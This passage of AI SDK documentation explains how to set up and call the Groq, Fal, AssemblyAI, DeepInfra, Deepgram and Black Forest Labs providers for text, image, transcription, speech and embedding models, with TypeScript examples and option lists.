| `moonshotai/kimi-k2-instruct-0905` | | | | |
| `qwen/qwen3-32b` | | | | |
| `llama-guard-3-8b` | | | | |
| `llama3-70b-8192` | | | | |
| `llama3-8b-8192` | | | | |
| `mixtral-8x7b-32768` | | | | |
| `qwen-qwq-32b` | | | | |
| `qwen-2.5-32b` | | | | |
| `deepseek-r1-distill-qwen-32b` | | | | |
| `openai/gpt-oss-20b` | | | | |
| `openai/gpt-oss-120b` | | | | |
Browser Search Tool
Groq provides a browser search tool that offers interactive web browsing capabilities. Unlike traditional web search, browser search navigates websites interactively, providing more detailed and comprehensive results.
Supported Models
Browser search is only available for these specific models:
- `openai/gpt-oss-20b`
- `openai/gpt-oss-120b`
Basic Usage
import { groq } from '@ai-sdk/groq';
import { generateText } from 'ai';
const result = await generateText({
model: groq('openai/gpt-oss-120b'), // Must use supported model
prompt:
'What are the latest developments in AI? Please search for recent news.',
tools: {
browser_search: groq.tools.browserSearch({}),
},
toolChoice: 'required', // Ensure the tool is used
});
console.log(result.text);
Streaming Example
import { groq } from '@ai-sdk/groq';
import { streamText } from 'ai';
const result = streamText({
model: groq('openai/gpt-oss-120b'),
prompt: 'Search for the latest tech news and summarize it.',
tools: {
browser_search: groq.tools.browserSearch({}),
},
toolChoice: 'required',
});
for await (const delta of result.fullStream) {
if (delta.type === 'text-delta') {
process.stdout.write(delta.text);
}
}
Key Features
- Interactive Browsing: Navigates websites like a human user
- Comprehensive Results: More detailed than traditional search snippets
- Server-side Execution: Runs on Groq's infrastructure, no setup required
- Powered by Exa: Uses Exa search engine for optimal results
- Currently Free: Available at no additional charge during beta
Best Practices
- Use `toolChoice: 'required'` to ensure the browser search is activated
- Only supported on `openai/gpt-oss-20b` and `openai/gpt-oss-120b` models
- The tool works automatically - no configuration parameters needed
- Server-side execution means no additional API keys or setup required
Model Validation
The provider automatically validates model compatibility:
// ✅ Supported - will work
const result = await generateText({
model: groq('openai/gpt-oss-120b'),
tools: { browser_search: groq.tools.browserSearch({}) },
});
// ❌ Unsupported - will show warning and ignore tool
const result = await generateText({
model: groq('gemma2-9b-it'),
tools: { browser_search: groq.tools.browserSearch({}) },
});
// Warning: "Browser search is only supported on models: openai/gpt-oss-20b, openai/gpt-oss-120b"
Transcription Models
You can create models that call the Groq transcription API
using the .transcription() factory method.
The first argument is the model id, e.g. whisper-large-v3.
const model = groq.transcription('whisper-large-v3');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format will improve accuracy and latency.
import { experimental_transcribe as transcribe } from 'ai';
import { groq } from '@ai-sdk/groq';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: groq.transcription('whisper-large-v3'),
audio: await readFile('audio.mp3'),
providerOptions: { groq: { language: 'en' } },
});
The following provider options are available:
- timestampGranularities string[]
  The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: there is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
- language string
  The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
- prompt string
  An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
- temperature number
  The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
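For instance, word-level timestamps can be requested alongside segment timestamps. This is a minimal sketch based on the options above; the audio file name is illustrative:

```ts
import { experimental_transcribe as transcribe } from 'ai';
import { groq } from '@ai-sdk/groq';
import { readFile } from 'fs/promises';

// Request both word- and segment-level timestamps.
// Note: word timestamps incur additional latency.
const result = await transcribe({
  model: groq.transcription('whisper-large-v3'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    groq: { timestampGranularities: ['word', 'segment'] },
  },
});
```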
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper-large-v3 | | | | |
| whisper-large-v3-turbo | | | | |
| distil-whisper-large-v3-en | | | | |
title: Fal description: Learn how to use Fal AI models with the AI SDK.
Fal Provider
Fal AI provides a generative media platform for developers with lightning-fast inference capabilities. Their platform offers optimized performance for running diffusion models, with speeds up to 4x faster than alternatives.
Setup
The Fal provider is available via the @ai-sdk/fal module. You can install it with pnpm add @ai-sdk/fal (or the equivalent npm, yarn, or bun command).
Provider Instance
You can import the default provider instance fal from @ai-sdk/fal:
import { fal } from '@ai-sdk/fal';
If you need a customized setup, you can import createFal and create a provider instance with your settings:
import { createFal } from '@ai-sdk/fal';
const fal = createFal({
apiKey: 'your-api-key', // optional, defaults to FAL_API_KEY environment variable, falling back to FAL_KEY
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the Fal provider instance:
- baseURL string
  Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://fal.run.
- apiKey string
  API key that is being sent using the Authorization header. It defaults to the FAL_API_KEY environment variable, falling back to FAL_KEY.
- headers Record<string,string>
  Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Image Models
You can create Fal image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Basic Usage
import { fal } from '@ai-sdk/fal';
import { experimental_generateImage as generateImage } from 'ai';
import fs from 'fs';
const { image, providerMetadata } = await generateImage({
model: fal.image('fal-ai/flux/dev'),
prompt: 'A serene mountain landscape at sunset',
});
const filename = `image-${Date.now()}.png`;
fs.writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);
Fal image models may return additional information for the images and the request. Here are some examples of properties that may be set for each image:
providerMetadata.fal.images[0].nsfw; // boolean, image is not safe for work
providerMetadata.fal.images[0].width; // number, image width
providerMetadata.fal.images[0].height; // number, image height
providerMetadata.fal.images[0].content_type; // string, mime type of the image
Model Capabilities
Fal offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Fal AI Search Page.
| Model | Description |
|---|---|
| fal-ai/flux/dev | FLUX.1 [dev] model for high-quality image generation |
| fal-ai/flux-pro/kontext | FLUX.1 Kontext [pro] handles both text and reference images as inputs, enabling targeted edits and complex transformations |
| fal-ai/flux-pro/kontext/max | FLUX.1 Kontext [max] with improved prompt adherence and typography generation |
| fal-ai/flux-lora | Super fast endpoint for FLUX.1 with LoRA support |
| fal-ai/ideogram/character | Generate consistent character appearances across multiple images. Maintain facial features, proportions, and distinctive traits |
| fal-ai/qwen-image | Qwen-Image foundation model with significant advances in complex text rendering and precise image editing |
| fal-ai/omnigen-v2 | Unified image generation model for Image Editing, Personalized Image Generation, Virtual Try-On, Multi Person Generation and more |
| fal-ai/bytedance/dreamina/v3.1/text-to-image | Dreamina showcases superior picture effects with improvements in aesthetics, precise and diverse styles, and rich details |
| fal-ai/recraft/v3/text-to-image | SOTA in image generation with vector art and brand style capabilities |
| fal-ai/wan/v2.2-a14b/text-to-image | High-resolution, photorealistic images with fine-grained detail |
Fal models support the following aspect ratios:
- 1:1 (square HD)
- 16:9 (landscape)
- 9:16 (portrait)
- 4:3 (landscape)
- 3:4 (portrait)
- 16:10 (1280x800)
- 10:16 (800x1280)
- 21:9 (2560x1080)
- 9:21 (1080x2560)
Key features of Fal models include:
- Up to 4x faster inference speeds compared to alternatives
- Optimized by the Fal Inference Engine™
- Support for real-time infrastructure
- Cost-effective scaling with pay-per-use pricing
- LoRA training capabilities for model personalization
Modify Image
Transform existing images using text prompts.
// Example: Modify existing image
await generateImage({
model: fal.image('fal-ai/flux-pro/kontext'),
prompt: 'Put a donut next to the flour.',
providerOptions: {
fal: {
imageUrl:
'https://v3.fal.media/files/rabbit/rmgBxhwGYb2d3pl3x9sKf_output.png',
},
},
});
Provider Options
Fal image models support flexible provider options through the providerOptions.fal object. You can pass any parameters supported by the specific Fal model's API. Common options include:
- imageUrl - Reference image URL for image-to-image generation
- strength - Controls how much the output differs from the input image
- guidanceScale - Controls adherence to the prompt (range: 1-20)
- numInferenceSteps - Number of denoising steps (range: 1-50)
- enableSafetyChecker - Enable/disable safety filtering
- outputFormat - Output format: 'jpeg' or 'png'
- syncMode - Wait for completion before returning response
- acceleration - Speed of generation: 'none', 'regular', or 'high'
- safetyTolerance - Content safety filtering level (1-6, where 1 is strictest)
Refer to the Fal AI model documentation for model-specific parameters.
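As a minimal sketch of several of these options used together (the reference image URL is a placeholder):

```ts
import { fal } from '@ai-sdk/fal';
import { experimental_generateImage as generateImage } from 'ai';

// Image-to-image generation using a few of the documented options.
const { image } = await generateImage({
  model: fal.image('fal-ai/flux/dev'),
  prompt: 'Turn the sketch into a watercolor painting',
  providerOptions: {
    fal: {
      imageUrl: 'https://example.com/sketch.png', // placeholder reference image
      strength: 0.6, // how far the output may drift from the input
      numInferenceSteps: 30, // denoising steps (1-50)
      outputFormat: 'png',
    },
  },
});
```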
Advanced Features
Fal's platform offers several advanced capabilities:
- Private Model Inference: Run your own diffusion transformer models with up to 50% faster inference
- LoRA Training: Train and personalize models in under 5 minutes
- Real-time Infrastructure: Enable new user experiences with fast inference times
- Scalable Architecture: Scale to thousands of GPUs when needed
For more details about Fal's capabilities and features, visit the Fal AI documentation.
Transcription Models
You can create models that call the Fal transcription API
using the .transcription() factory method.
The first argument is the model id without the fal-ai/ prefix e.g. wizper.
const model = fal.transcription('wizper');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the batchSize option will increase the number of audio chunks processed in parallel.
import { experimental_transcribe as transcribe } from 'ai';
import { fal } from '@ai-sdk/fal';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: fal.transcription('wizper'),
audio: await readFile('audio.mp3'),
providerOptions: { fal: { batchSize: 10 } },
});
The following provider options are available:
- language string
  Language of the audio file. If set to null, the language will be automatically detected. Accepts ISO language codes like 'en', 'fr', 'zh', etc. Optional.
- diarize boolean
  Whether to diarize the audio file (identify different speakers). Defaults to true. Optional.
- chunkLevel string
  Level of the chunks to return. Either 'segment' or 'word'. Default value: 'segment'. Optional.
- version string
  Version of the model to use. All models are Whisper large variants. Default value: '3'. Optional.
- batchSize number
  Batch size for processing. Default value: 64. Optional.
- numSpeakers number
  Number of speakers in the audio file. If not provided, the number of speakers will be automatically detected. Optional.
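For example, speaker diarization can be combined with an expected speaker count. A minimal sketch using the options above (the file name is illustrative):

```ts
import { experimental_transcribe as transcribe } from 'ai';
import { fal } from '@ai-sdk/fal';
import { readFile } from 'fs/promises';

// Diarize a two-speaker interview recording.
const result = await transcribe({
  model: fal.transcription('wizper'),
  audio: await readFile('interview.mp3'),
  providerOptions: {
    fal: { diarize: true, numSpeakers: 2 },
  },
});
```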
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper | | | | |
| wizper | | | | |
Speech Models
You can create models that call Fal text-to-speech endpoints using the .speech() factory method.
Basic Usage
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { fal } from '@ai-sdk/fal';
const result = await generateSpeech({
model: fal.speech('fal-ai/minimax/speech-02-hd'),
text: 'Hello from the AI SDK!',
});
Model Capabilities
| Model | Description |
|---|---|
| fal-ai/minimax/voice-clone | Clone a voice from a sample audio and generate speech from text prompts |
| fal-ai/minimax/voice-design | Design a personalized voice from a text description and generate speech from text prompts |
| fal-ai/dia-tts/voice-clone | Clone dialog voices from a sample audio and generate dialogs from text prompts |
| fal-ai/minimax/speech-02-hd | Generate speech from text prompts and different voices |
| fal-ai/minimax/speech-02-turbo | Generate fast speech from text prompts and different voices |
| fal-ai/dia-tts | Directly generates realistic dialogue from transcripts with audio conditioning for emotion control. Produces natural nonverbals like laughter and throat clearing |
| resemble-ai/chatterboxhd/text-to-speech | Generate expressive, natural speech with Resemble AI's Chatterbox. Features unique emotion control, instant voice cloning from short audio, and built-in watermarking |
Provider Options
Pass provider-specific options via providerOptions.fal depending on the model:
- voice_setting object
  - voice_id (string): predefined voice ID
  - speed (number): 0.5-2.0
  - vol (number): 0-10
  - pitch (number): -12 to 12
  - emotion (enum): happy | sad | angry | fearful | disgusted | surprised | neutral
  - english_normalization (boolean)
- audio_setting object
  Audio configuration settings specific to the model.
- language_boost enum
  Chinese | Chinese,Yue | English | Arabic | Russian | Spanish | French | Portuguese | German | Turkish | Dutch | Ukrainian | Vietnamese | Indonesian | Japanese | Italian | Korean | Thai | Polish | Romanian | Greek | Czech | Finnish | Hindi | auto
- pronunciation_dict object
  Custom pronunciation dictionary for specific words.
Model-specific parameters (e.g., audio_url, prompt, preview_text, ref_audio_url, ref_text) can be passed directly under providerOptions.fal and will be forwarded to the Fal API.
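A minimal sketch passing a voice_setting object from the list above (the specific values are illustrative):

```ts
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { fal } from '@ai-sdk/fal';

// Generate slightly faster, happier speech.
const result = await generateSpeech({
  model: fal.speech('fal-ai/minimax/speech-02-hd'),
  text: 'Welcome back! Let me walk you through the changes.',
  providerOptions: {
    fal: {
      voice_setting: {
        speed: 1.1, // 0.5-2.0
        emotion: 'happy',
      },
    },
  },
});
```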
title: AssemblyAI description: Learn how to use the AssemblyAI provider for the AI SDK.
AssemblyAI Provider
The AssemblyAI provider contains language model support for the AssemblyAI transcription API.
Setup
The AssemblyAI provider is available in the @ai-sdk/assemblyai module. You can install it with pnpm add @ai-sdk/assemblyai (or the equivalent npm, yarn, or bun command).
Provider Instance
You can import the default provider instance assemblyai from @ai-sdk/assemblyai:
import { assemblyai } from '@ai-sdk/assemblyai';
If you need a customized setup, you can import createAssemblyAI from @ai-sdk/assemblyai and create a provider instance with your settings:
import { createAssemblyAI } from '@ai-sdk/assemblyai';
const assemblyai = createAssemblyAI({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the AssemblyAI provider instance:
- apiKey string
  API key that is being sent using the Authorization header. It defaults to the ASSEMBLYAI_API_KEY environment variable.
- headers Record<string,string>
  Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Transcription Models
You can create models that call the AssemblyAI transcription API
using the .transcription() factory method.
The first argument is the model id e.g. best.
const model = assemblyai.transcription('best');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the contentSafety option will enable content safety filtering.
import { experimental_transcribe as transcribe } from 'ai';
import { assemblyai } from '@ai-sdk/assemblyai';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: assemblyai.transcription('best'),
audio: await readFile('audio.mp3'),
providerOptions: { assemblyai: { contentSafety: true } },
});
The following provider options are available:
- audioEndAt number
  End time of the audio in milliseconds. Optional.
- audioStartFrom number
  Start time of the audio in milliseconds. Optional.
- autoChapters boolean
  Whether to automatically generate chapters for the transcription. Optional.
- autoHighlights boolean
  Whether to automatically generate highlights for the transcription. Optional.
- boostParam enum
  Boost parameter for the transcription. Allowed values: 'low', 'default', 'high'. Optional.
- contentSafety boolean
  Whether to enable content safety filtering. Optional.
- contentSafetyConfidence number
  Confidence threshold for content safety filtering (25-100). Optional.
- customSpelling array of objects
  Custom spelling rules for the transcription. Each object has from (array of strings) and to (string) properties. Optional.
- disfluencies boolean
  Whether to include disfluencies (um, uh, etc.) in the transcription. Optional.
- entityDetection boolean
  Whether to detect entities in the transcription. Optional.
- filterProfanity boolean
  Whether to filter profanity in the transcription. Optional.
- formatText boolean
  Whether to format the text in the transcription. Optional.
- iabCategories boolean
  Whether to include IAB categories in the transcription. Optional.
- languageCode string
  Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
- languageConfidenceThreshold number
  Confidence threshold for language detection. Optional.
- languageDetection boolean
  Whether to enable language detection. Optional.
- multichannel boolean
  Whether to process multiple audio channels separately. Optional.
- punctuate boolean
  Whether to add punctuation to the transcription. Optional.
- redactPii boolean
  Whether to redact personally identifiable information. Optional.
- redactPiiAudio boolean
  Whether to redact PII in the audio file. Optional.
- redactPiiAudioQuality enum
  Quality of the redacted audio file. Allowed values: 'mp3', 'wav'. Optional.
- redactPiiPolicies array of enums
  Policies for PII redaction, specifying which types of information to redact. Supports numerous types like 'person_name', 'phone_number', etc. Optional.
- redactPiiSub enum
  Substitution method for redacted PII. Allowed values: 'entity_name', 'hash'. Optional.
- sentimentAnalysis boolean
  Whether to perform sentiment analysis on the transcription. Optional.
- speakerLabels boolean
  Whether to label different speakers in the transcription. Optional.
- speakersExpected number
  Expected number of speakers in the audio. Optional.
- speechThreshold number
  Threshold for speech detection (0-1). Optional.
- summarization boolean
  Whether to generate a summary of the transcription. Optional.
- summaryModel enum
  Model to use for summarization. Allowed values: 'informative', 'conversational', 'catchy'. Optional.
- summaryType enum
  Type of summary to generate. Allowed values: 'bullets', 'bullets_verbose', 'gist', 'headline', 'paragraph'. Optional.
- topics array of strings
  List of topics to detect in the transcription. Optional.
- webhookAuthHeaderName string
  Name of the authentication header for webhook requests. Optional.
- webhookAuthHeaderValue string
  Value of the authentication header for webhook requests. Optional.
- webhookUrl string
  URL to send webhook notifications to. Optional.
- wordBoost array of strings
  List of words to boost in the transcription. Optional.
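A minimal sketch combining several of these options in a single request (the file name is illustrative):

```ts
import { experimental_transcribe as transcribe } from 'ai';
import { assemblyai } from '@ai-sdk/assemblyai';
import { readFile } from 'fs/promises';

// Label speakers and return a bullet-point summary of a meeting recording.
const result = await transcribe({
  model: assemblyai.transcription('best'),
  audio: await readFile('meeting.mp3'),
  providerOptions: {
    assemblyai: {
      speakerLabels: true,
      summarization: true,
      summaryType: 'bullets',
    },
  },
});
```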
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| best | | | | |
| nano | | | | |
title: DeepInfra description: Learn how to use DeepInfra's models with the AI SDK.
DeepInfra Provider
The DeepInfra provider contains support for state-of-the-art models through the DeepInfra API, including Llama 3, Mixtral, Qwen, and many other popular open-source models.
Setup
The DeepInfra provider is available via the @ai-sdk/deepinfra module. You can install it with pnpm add @ai-sdk/deepinfra (or the equivalent npm, yarn, or bun command).
Provider Instance
You can import the default provider instance deepinfra from @ai-sdk/deepinfra:
import { deepinfra } from '@ai-sdk/deepinfra';
If you need a customized setup, you can import createDeepInfra from @ai-sdk/deepinfra and create a provider instance with your settings:
import { createDeepInfra } from '@ai-sdk/deepinfra';
const deepinfra = createDeepInfra({
apiKey: process.env.DEEPINFRA_API_KEY ?? '',
});
You can use the following optional settings to customize the DeepInfra provider instance:
- baseURL string
  Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.deepinfra.com/v1. Note: language models and embeddings use OpenAI-compatible endpoints at {baseURL}/openai, while image models use {baseURL}/inference.
- apiKey string
  API key that is being sent using the Authorization header. It defaults to the DEEPINFRA_API_KEY environment variable.
- headers Record<string,string>
  Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create language models using a provider instance. The first argument is the model ID, for example:
import { deepinfra } from '@ai-sdk/deepinfra';
import { generateText } from 'ai';
const { text } = await generateText({
model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
DeepInfra language models can also be used in the streamText function (see AI SDK Core).
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8 | | | | |
| meta-llama/Llama-4-Scout-17B-16E-Instruct | | | | |
| meta-llama/Llama-3.3-70B-Instruct-Turbo | | | | |
| meta-llama/Llama-3.3-70B-Instruct | | | | |
| meta-llama/Meta-Llama-3.1-405B-Instruct | | | | |
| meta-llama/Meta-Llama-3.1-70B-Instruct-Turbo | | | | |
| meta-llama/Meta-Llama-3.1-70B-Instruct | | | | |
| meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo | | | | |
| meta-llama/Meta-Llama-3.1-8B-Instruct | | | | |
| meta-llama/Llama-3.2-11B-Vision-Instruct | | | | |
| meta-llama/Llama-3.2-90B-Vision-Instruct | | | | |
| mistralai/Mixtral-8x7B-Instruct-v0.1 | | | | |
| deepseek-ai/DeepSeek-V3 | | | | |
| deepseek-ai/DeepSeek-R1 | | | | |
| deepseek-ai/DeepSeek-R1-Distill-Llama-70B | | | | |
| deepseek-ai/DeepSeek-R1-Turbo | | | | |
| nvidia/Llama-3.1-Nemotron-70B-Instruct | | | | |
| Qwen/Qwen2-7B-Instruct | | | | |
| Qwen/Qwen2.5-72B-Instruct | | | | |
| Qwen/Qwen2.5-Coder-32B-Instruct | | | | |
| Qwen/QwQ-32B-Preview | | | | |
| google/codegemma-7b-it | | | | |
| google/gemma-2-9b-it | | | | |
| microsoft/WizardLM-2-8x22B | | | | |
Image Models
You can create DeepInfra image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
import { deepinfra } from '@ai-sdk/deepinfra';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: deepinfra.image('stabilityai/sd3.5'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
});
Model-specific options
You can pass model-specific parameters using the providerOptions.deepinfra field:
import { deepinfra } from '@ai-sdk/deepinfra';
import { experimental_generateImage as generateImage } from 'ai';
const { image } = await generateImage({
model: deepinfra.image('stabilityai/sd3.5'),
prompt: 'A futuristic cityscape at sunset',
aspectRatio: '16:9',
providerOptions: {
deepinfra: {
num_inference_steps: 30, // Control the number of denoising steps (1-50)
},
},
});
Model Capabilities
For models supporting aspect ratios, the following ratios are typically supported:
1:1 (default), 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21
For models supporting size parameters, dimensions must typically be:
- Multiples of 32
- Width and height between 256 and 1440 pixels
- Default size is 1024x1024
| Model | Dimensions Specification | Notes |
|---|---|---|
| stabilityai/sd3.5 | Aspect Ratio | Premium quality base model, 8B parameters |
| black-forest-labs/FLUX-1.1-pro | Size | Latest state-of-art model with superior prompt following |
| black-forest-labs/FLUX-1-schnell | Size | Fast generation in 1-4 steps |
| black-forest-labs/FLUX-1-dev | Size | Optimized for anatomical accuracy |
| black-forest-labs/FLUX-pro | Size | Flagship Flux model |
| stabilityai/sd3.5-medium | Aspect Ratio | Balanced 2.5B parameter model |
| stabilityai/sdxl-turbo | Aspect Ratio | Optimized for fast generation |
For more details and pricing information, see the DeepInfra text-to-image models page.
Embedding Models
You can create DeepInfra embedding models using the .textEmbedding() factory method.
For more on embedding models with the AI SDK see embed().
import { deepinfra } from '@ai-sdk/deepinfra';
import { embed } from 'ai';
const { embedding } = await embed({
model: deepinfra.textEmbedding('BAAI/bge-large-en-v1.5'),
value: 'sunny day at the beach',
});
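Multiple values can be embedded in a single call with embedMany from the ai package; a minimal sketch:

```ts
import { deepinfra } from '@ai-sdk/deepinfra';
import { embedMany } from 'ai';

// Batch-embed several values in one request.
const { embeddings } = await embedMany({
  model: deepinfra.textEmbedding('BAAI/bge-large-en-v1.5'),
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
});
```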
Model Capabilities
| Model | Dimensions | Max Tokens |
|---|---|---|
| BAAI/bge-base-en-v1.5 | 768 | 512 |
| BAAI/bge-large-en-v1.5 | 1024 | 512 |
| BAAI/bge-m3 | 1024 | 8192 |
| intfloat/e5-base-v2 | 768 | 512 |
| intfloat/e5-large-v2 | 1024 | 512 |
| intfloat/multilingual-e5-large | 1024 | 512 |
| sentence-transformers/all-MiniLM-L12-v2 | 384 | 256 |
| sentence-transformers/all-MiniLM-L6-v2 | 384 | 256 |
| sentence-transformers/all-mpnet-base-v2 | 768 | 384 |
| sentence-transformers/clip-ViT-B-32 | 512 | 77 |
| sentence-transformers/clip-ViT-B-32-multilingual-v1 | 512 | 77 |
| sentence-transformers/multi-qa-mpnet-base-dot-v1 | 768 | 512 |
| sentence-transformers/paraphrase-MiniLM-L6-v2 | 384 | 128 |
| shibing624/text2vec-base-chinese | 768 | 512 |
| thenlper/gte-base | 768 | 512 |
| thenlper/gte-large | 1024 | 512 |
title: Deepgram description: Learn how to use the Deepgram provider for the AI SDK.
Deepgram Provider
The Deepgram provider contains language model support for the Deepgram transcription API.
Setup
The Deepgram provider is available in the @ai-sdk/deepgram module. You can install it with pnpm add @ai-sdk/deepgram (or the equivalent npm, yarn, or bun command).
Provider Instance
You can import the default provider instance deepgram from @ai-sdk/deepgram:
import { deepgram } from '@ai-sdk/deepgram';
If you need a customized setup, you can import createDeepgram from @ai-sdk/deepgram and create a provider instance with your settings:
import { createDeepgram } from '@ai-sdk/deepgram';
const deepgram = createDeepgram({
// custom settings, e.g.
fetch: customFetch,
});
You can use the following optional settings to customize the Deepgram provider instance:
- apiKey string
  API key that is being sent using the Authorization header. It defaults to the DEEPGRAM_API_KEY environment variable.
- headers Record<string,string>
  Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Transcription Models
You can create models that call the Deepgram transcription API
using the .transcription() factory method.
The first argument is the model id e.g. nova-3.
const model = deepgram.transcription('nova-3');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.
import { experimental_transcribe as transcribe } from 'ai';
import { deepgram } from '@ai-sdk/deepgram';
import { readFile } from 'fs/promises';
const result = await transcribe({
model: deepgram.transcription('nova-3'),
audio: await readFile('audio.mp3'),
providerOptions: { deepgram: { summarize: true } },
});
The following provider options are available:
- language string
  Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
- smartFormat boolean
  Whether to apply smart formatting to the transcription. Optional.
- punctuate boolean
  Whether to add punctuation to the transcription. Optional.
- paragraphs boolean
  Whether to format the transcription into paragraphs. Optional.
- summarize enum | boolean
  Whether to generate a summary of the transcription. Allowed values: 'v2', false. Optional.
- topics boolean
  Whether to detect topics in the transcription. Optional.
- intents boolean
  Whether to detect intents in the transcription. Optional.
- sentiment boolean
  Whether to perform sentiment analysis on the transcription. Optional.
- detectEntities boolean
  Whether to detect entities in the transcription. Optional.
- redact string | array of strings
  Specifies what content to redact from the transcription. Optional.
- replace string
  Replacement string for redacted content. Optional.
- search string
  Search term to find in the transcription. Optional.
- keyterm string
  Key terms to identify in the transcription. Optional.
- diarize boolean
  Whether to identify different speakers in the transcription. Defaults to true. Optional.
- utterances boolean
  Whether to segment the transcription into utterances. Optional.
- uttSplit number
  Threshold for splitting utterances. Optional.
- fillerWords boolean
  Whether to include filler words (um, uh, etc.) in the transcription. Optional.
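For example, diarization and smart formatting can be enabled together; a minimal sketch using the options above:

```ts
import { experimental_transcribe as transcribe } from 'ai';
import { deepgram } from '@ai-sdk/deepgram';
import { readFile } from 'fs/promises';

// Identify speakers and apply smart formatting in one request.
const result = await transcribe({
  model: deepgram.transcription('nova-3'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    deepgram: { diarize: true, smartFormat: true },
  },
});
```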
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| nova-3 (+ variants) | | | | |
| nova-2 (+ variants) | | | | |
| nova (+ variants) | | | | |
| enhanced (+ variants) | | | | |
| base (+ variants) | | | | |
title: Black Forest Labs description: Learn how to use Black Forest Labs models with the AI SDK.
Black Forest Labs Provider
Black Forest Labs provides a generative image platform for developers with FLUX-based models. Their platform offers fast, high quality, and in-context image generation and editing with precise and coherent results.
Setup
The Black Forest Labs provider is available via the @ai-sdk/black-forest-labs module. You can install it with pnpm add @ai-sdk/black-forest-labs (or the equivalent npm, yarn, or bun command).
Provider Instance
You can import the default provider instance blackForestLabs from @ai-sdk/black-forest-labs:
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
If you need a customized setup, you can import createBlackForestLabs and create a provider instance with your settings:
import { createBlackForestLabs } from '@ai-sdk/black-forest-labs';
const blackForestLabs = createBlackForestLabs({
apiKey: 'your-api-key', // optional, defaults to BFL_API_KEY environment variable
baseURL: 'custom-url', // optional
headers: {
/* custom headers */
}, // optional
});
You can use the following optional settings to customize the Black Forest Labs provider instance:
- baseURL string
  Use a different URL prefix for API calls, e.g. to use a regional endpoint. The default prefix is https://api.bfl.ai/v1.
- apiKey string
  API key that is being sent using the x-key header. It defaults to the BFL_API_KEY environment variable.
- headers Record<string,string>
  Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>
  Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Image Models
You can create Black Forest Labs image models using the .image() factory method.
For more on image generation with the AI SDK see generateImage().
Basic Usage
import { writeFileSync } from 'node:fs';
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { experimental_generateImage as generateImage } from 'ai';
const { image, providerMetadata } = await generateImage({
model: blackForestLabs.image('flux-pro-1.1'),
prompt: 'A serene mountain landscape at sunset',
});
const filename = `image-${Date.now()}.png`;
writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);
Model Capabilities
Black Forest Labs offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Black Forest Labs Models Page.
| Model | Description |
|---|---|
| flux-kontext-pro | FLUX.1 Kontext [pro] handles both text and reference images as inputs, enabling targeted edits and complex transformations |
| flux-kontext-max | FLUX.1 Kontext [max] with improved prompt adherence and typography generation |
| flux-pro-1.1-ultra | Ultra-fast, ultra high-resolution image creation |
| flux-pro-1.1 | Fast, high-quality image generation from text |
Black Forest Labs models support aspect ratios from 3:7 (portrait) to 7:3 (landscape).
Modify Image
Transform existing images using text prompts.
import {
